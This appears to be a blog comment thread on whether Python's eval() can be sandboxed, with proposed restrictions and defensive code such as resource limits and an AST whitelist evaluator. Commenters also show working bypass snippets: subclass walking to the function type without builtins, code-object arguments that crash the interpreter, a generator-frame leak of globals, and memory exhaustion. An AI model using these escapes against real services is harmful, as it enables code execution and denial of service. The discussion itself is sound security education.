    if ("." in st) or ("f\"" in st):
        raise ValueError
    return exec(st, {'__builtins__': {}})
This is indeed not too restrictive. Just forget about things like arr.append(ele), and use instead the purely functional programming paradigm (map, reduce, yield) + making use of lazy evaluation.

The reason this works is because ultimately you get __builtins__ from either the attributes of an object, or from a dictionary. Disallowing dot eliminates the first possibility. I don't think it is possible to directly get __builtins__ from dictionaries. If it is possible, we can statically replace the [] operator f[x] by get(f, x), and monitor the behavior of get() during run time
[gravatar]
blacklisting f-strings is prolly unnecessary. I was thinking of f"{eval('()' + chr(46) + '__class__')}", but eval is not available without builtins
[gravatar]
@Cocoshark, you are mostly OK if you disable attribute access and f-strings. You also have to make sure you disallow certain builtins like eval itself. Even so, there are still potential ways that people can do nasty things to your machine. For example, eval('10**10**100') will run until all the memory on the system is consumed and then crash. See https://stackoverflow.com/questions/35804961/python-eval-is-it-still-dangerous-if-i-disable-builtins-and-attribute-access
[gravatar]
Ty for your reply!

An improvement to this approach is whitelisting certain attribute access.

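import re

whitelist = ["append", "split", "join", ...]

# the dot is escaped so it only matches attribute access; the lookahead also counts a name at the very end of the string
whitelist_pattern = r"\.(append|split|join)(?![a-zA-Z0-9_])"

pattern = r"\.[a-zA-Z0-9_]+(?![a-zA-Z0-9_])"

def safety_check(s):
    # every attribute access must be a whitelisted one (note: "x. __class__", with a space after the dot, is not caught)
    return len(re.findall(pattern, s)) == len(re.findall(whitelist_pattern, s))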

Finally, run it in a separate process and use cgroups to control its memory and time consumption.

It is a very cheap option (in terms of execution time, management overhead and $$$). Running it in a separate virtual machine requires substantially more computing resources, and I simply can't afford it.
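A cheap variant of the separate-process idea can be sketched with the standard library alone. Note that this swaps in POSIX resource limits (resource.setrlimit) in place of the cgroups mentioned above, so it is Unix-only, and RLIMIT_AS behaves differently across platforms. The names run_untrusted and limit_resources and the specific limits are illustrative assumptions.

```python
import resource
import subprocess
import sys

# Illustrative limits (assumptions; tune for your workload)
MEM_BYTES = 1024 * 1024 * 1024  # 1 GiB of address space
CPU_SECONDS = 2

# Program run by the child: read an expression on stdin, evaluate it with
# no builtins, and print its repr on stdout.
CHILD = (
    "import sys\n"
    "src = sys.stdin.read()\n"
    "print(repr(eval(src, {'__builtins__': {}}, {})))\n"
)


def limit_resources():
    # Runs in the forked child just before exec (POSIX only).
    for kind, value in ((resource.RLIMIT_AS, MEM_BYTES),
                        (resource.RLIMIT_CPU, CPU_SECONDS)):
        _, hard = resource.getrlimit(kind)
        if hard != resource.RLIM_INFINITY:
            value = min(value, hard)
        resource.setrlimit(kind, (value, value))


def run_untrusted(src, timeout=5):
    proc = subprocess.run(
        [sys.executable, "-c", CHILD],
        input=src,
        capture_output=True,
        text=True,
        preexec_fn=limit_resources,
        timeout=timeout,  # wall-clock backstop; raises TimeoutExpired
    )
    if proc.returncode != 0:
        # Covers exceptions (exit code 1) and crashes or kills (negative codes).
        detail = proc.stderr.strip().splitlines()[-1:] or [""]
        raise RuntimeError(f"child exited with {proc.returncode}: {detail[0]}")
    return proc.stdout.strip()
```

run_untrusted("2 + 3 * 4") returns '14'. The segfaulting example from the post would surface as a RuntimeError with a negative exit code while the parent keeps running. Unlike a VM, this does not isolate the file system or the network.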
[gravatar]
What if you did this:

input_string = input_string.replace("(", " (")
result = eval(input_string, {"__builtins__": {}}, {})

(That is, put a space in front of every opening parenthesis.)
[gravatar]
@David, I don't see how adding a space can help. Python executes "f()" and "f ()" exactly the same.
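A quick check with the standard library (a sketch, run under CPython) shows that inserting a space before the parenthesis changes nothing the interpreter cares about: the parse trees and the bytecode are identical.

```python
import ast

# The parser produces identical trees with or without the space...
with_space = ast.dump(ast.parse("f ()", mode="eval"))
without_space = ast.dump(ast.parse("f()", mode="eval"))
print(with_space == without_space)  # True

# ...and the compiler emits identical bytecode.
same_code = (compile("f ()", "<s>", "eval").co_code
             == compile("f()", "<s>", "eval").co_code)
print(same_code)  # True
```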
[gravatar]
@ken (i say four years later... sorry!), that might actually be good enough, with enough effort maintaining the allow list, but i don't feel up to doing a full audit of every single operation you used. the fundamental problem with eval is an unintuitively high surface area combined with python's complete lack of privacy and high runtime mutability.

while allow rules (as opposed to deny rules) would be the right approach in the abstract, every single thing you allow is a potential security hole. with few enough exposed functions you may be able to reduce the risk to that of accepting any other untrusted input, and my original recommendation was to make a compiler or interpreter that you can guarantee has safe output; in some sense that's effectively what you're doing. however, the problem is that python has many normally-hidden operations that can cause unusual changes in behavior, and even if you get your allow rules to apply to the code without any correctness issues, you still end up having to maintain a mental blacklist of functions not to expose.

unfortunately, the recommendation to use the pypy sandbox has to be rescinded simply because that project didn't get maintenance momentum. if you must do remote code execution as part of your normal functionality, and you cannot simply implement a hyper minimal safe language in rust or something, i would very strongly recommend thorough defense in depth. run it in an unprivileged docker container in a vm on a host that you can erase easily and does not have any authorizations to anything that is a risk if compromised.
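As an illustration of the "hyper minimal safe language" end of that spectrum, here is a minimal sketch of a whitelist interpreter for plain arithmetic, written in Python with the ast module rather than Rust. Everything not explicitly allowed (names, calls, attribute access, subscripts) is rejected, and exponents are capped so that 10**10**100 is refused instead of exhausting memory. The name safe_arith and the MAX_EXPONENT value are assumptions for illustration.

```python
import ast
import operator

# Allow list: only these node types and operators are interpreted.
_BINOPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Pow: operator.pow,
}
_UNARY = {ast.USub: operator.neg, ast.UAdd: operator.pos}
MAX_EXPONENT = 100  # hypothetical cap


def safe_arith(src):
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        # Exact type check: excludes bool, str, bytes, None, etc.
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
            left, right = walk(node.left), walk(node.right)
            if isinstance(node.op, ast.Pow) and abs(right) > MAX_EXPONENT:
                raise ValueError("exponent too large")
            return _BINOPS[type(node.op)](left, right)
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY:
            return _UNARY[type(node.op)](walk(node.operand))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return walk(ast.parse(src, mode="eval"))
```

safe_arith("2 + 3 * 4") returns 14, while "__import__('os')" and "().__class__" are refused because Call and Attribute nodes are simply not on the list. Division by zero still raises ZeroDivisionError, and input length should be limited as well.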

btw how do i unsubscribe from this, ned?
[gravatar]
@Ned Batchelder: thanks for detailed contribution to the eval discussion and your responses to commenters.
I liked @David Goodger's comment (10:26 AM on 6 Jun 2012) about untrusted text, and your response, but MDN's page https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval! seems to say that the string can never be trusted.
As if everyone has something running in their browser just waiting for an errant eval as the only way it can do bad stuff "as the user" (in the browser). Surely this is not true, and really there are only 3 ways things can go wrong:
* your eval gets a string from the user and does something the user could do anyway
* the user's browser is completely compromised and the bad guy can do everything anyway
* your code goes out of its way to get compromised text and then evals it
And if you are not doing the last, there is no problem.
[gravatar]
@chad nash: as I understand it, using eval can perform many actions that the user would not normally be able to do, and as such, strings obtained from the user are the definition of "untrusted input".
[gravatar]
@chad: you linked to a page about JavaScript. In the Python context, your Python code will be running on a server. If you eval a string from the user, it will be executed at the server, not on the user's computer, so it isn't "something the user could do anyway."
[gravatar]
@Ned thanks for the quick response.
On the server, that is totally right.
In the browser, I am unsure whether "using eval can perform many actions that the user would not normally be able to do" is correct. I would love an example.
It might be true that eval lets users run code that would be more complicated to set up and run from the console, since it gives easier access to context. However, browsers have debuggers and breakpoints, so that context can be reached that way too.
The only thing I am left with is that eval might make it easier to find that context than breakpoints do.
[gravatar]
@ned I nearly found a reason, but it only argues for "don't eval text that doesn't conform to the same rules you would want on a server".

From: https://security.stackexchange.com/questions/94017/what-are-the-security-issues-with-eval-in-javascript

@StackTracer, a malicious link does not necessarily mean a link to a malicious website. In this context I believe mcgyver5 was referring to something like yourwebsite.com/?someParam=DoMaliciousThings where somewhere on your page you have a statement like eval(someParam) (highly simplified). That would be considered a reflected XSS attack since I could send you a link like that and when you open it your browser would execute my malicious javascript through the eval. Something like that looks more reasonable when you consider it could be combined with url encoding or shortened urls. – S.C. Jul 15 '15
[gravatar]
@ned the bottom 2 answers taken together on https://security.stackexchange.com/questions/94017/what-are-the-security-issues-with-eval-in-javascript might be the best so far
together they mean:

who can be bothered securing either
1 the data you accept from Alice, or
2 the shape of the text you run in eval on Bob's browser,
just to stop an eval you run on Bob's browser from containing malicious code that you accepted from Alice and used to build the text you are evaling, when you can just use Function? (I added this last bit myself.)

the arguments against that are:
* you always have to sanitise the text you get from Alice and store in a DB, and
* it is really easy to protect eval, just as you protect against SQL injection: build the text so that the unknown parts are parameters that must be alphanumeric only.
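In Python terms, the closest analogue to a parameterized SQL query is to keep the expression text fixed and pass the untrusted value in as data through eval's namespace, instead of pasting it into the source string. A minimal sketch; the function name double_it is hypothetical, and if the template really is fixed you usually don't need eval at all.

```python
def double_it(user_value):
    # The expression text is written by the programmer; the untrusted value
    # arrives as data in the locals mapping and is never parsed as code.
    return eval("x * 2", {"__builtins__": {}}, {"x": user_value})
```

double_it(21) returns 42, and double_it("__import__('os')") just returns that string repeated twice: the text is treated as a value, not executed.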
[gravatar]
@ned another possible reason to not use eval on a client.

With SQL injection, if you stuff up, then YOUR DB is screwed, but you have backups.

With eval "injection", if you stuff up, YOUR USERS are screwed, and they don't always have backups and sometimes can't have backups. For example, they can't have a backup of the money in their bank account that you might have helped compromise.
[gravatar]
@chad: you still seem focused on "eval in a browser." That is not what this page is about at all.
[gravatar]
@Ned
yep that was what I was focussed on.
Sorry if I missed the point.

My main reasons were (are now):
* eval in the backend is pretty much the same as SQL in the backend, for which there is a simple accepted solution
* JS in the backend is not something I would .... (though I might use Python)
* eval in the browser is what most discussions of this topic are about
* ARRG - I saw this page as what I wanted and failed to let the first line "Python has an eval() function" sink in - sorry again

though I did work out my thoughts on MY PROBLEM :)
[gravatar]

Try:

theCode = read_code_from_user()
theCode = """
import sys
sys.path = None
sys.modules = None
del sys
__import__ = exec = eval = "undefined"
"""+theCode
eval(theCode,{'__builtins__':{}},{})

Plus, we can spawn it in a separate process so crashes can be detected and handled. Can it damage the system with THESE precautions? Or can it at most crash the process?

[gravatar]

@SomePythonGuy: you should try your code! After correcting a few mistakes (you need exec, not eval; you can’t import sys if you don’t have __import__ in your builtins), it will still crash your interpreter.

The example crasher given in the blog post doesn’t use any builtin names, and doesn’t import anything. Removing builtins and modules won’t protect you.
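Both points can be checked directly. A sketch, assuming CPython 3; the helper raises is hypothetical. It shows that eval() rejects statements, that an import statement fails once builtins are removed, and that the crasher's lookup of the function type needs neither builtins nor imports.

```python
import types


def raises(exc_type, fn, *args):
    # Hypothetical helper: True if fn(*args) raises exc_type.
    try:
        fn(*args)
    except exc_type:
        return True
    return False


# eval() only accepts expressions; statements such as assignments need exec().
print(raises(SyntaxError, eval, "x = 1", {'__builtins__': {}}))       # True

# With no builtins, an import statement fails because __import__ is missing.
print(raises(ImportError, exec, "import sys", {'__builtins__': {}}))  # True

# ...but the crasher's way of finding the function type needs neither.
src = ("[c for c in ().__class__.__bases__[0].__subclasses__()"
       " if c.__name__ == 'function'][0]")
print(eval(src, {'__builtins__': {}}) is types.FunctionType)          # True
```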

[gravatar]

BTW, for Python 3.8 through 3.10, the arguments to “code” are now (3.11 changed the signature again):

0,0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"",
[gravatar]

I don’t understand how @Kevin’s expression works. It seems to work only if there is nothing (or spaces) at the position of “@” below:

[*( [x.append(x[0].gi_frame.f_back.f_back.f_globals for _ in (1,)) or x[0]  for x in [ [ @ ] ]][0] )][0]

If I replace “@” with a list or tuple, the expression will give its first element. Is this a bug in the Python interpreter? I tested it with Python 3.6.9.

Is there a clearer way to access a generator “while it is executing” as Kevin described, if that is the purpose of the strange expression? I imagine there may be links to all frames in the stack while a generator is executing to deal with exception catching. But if the mechanism in this example is an exfiltration of the interpreter’s internal data out to the script that has no utility other than as a hack, then I think it is a security issue.

[gravatar]

I will answer my own question.

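The key to the trick is that a generator expression, like a function, looks up the variables in its body only when it runs, not when it is created. By then it can reach itself through the list it was appended to, and so inspect its own frame. This can be demonstrated simply by: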

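x = []
# The body runs lazily, so by then x[0] is this very generator
x.append(x[0].gi_frame.f_back.f_globals for _ in (1,))
print(x[0].send(None) is globals())  # True: the caller's globals leak out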

The rest of the complications in Kevin’s example were to execute everything in a single “eval()”, so that the content fit exactly the original subject.
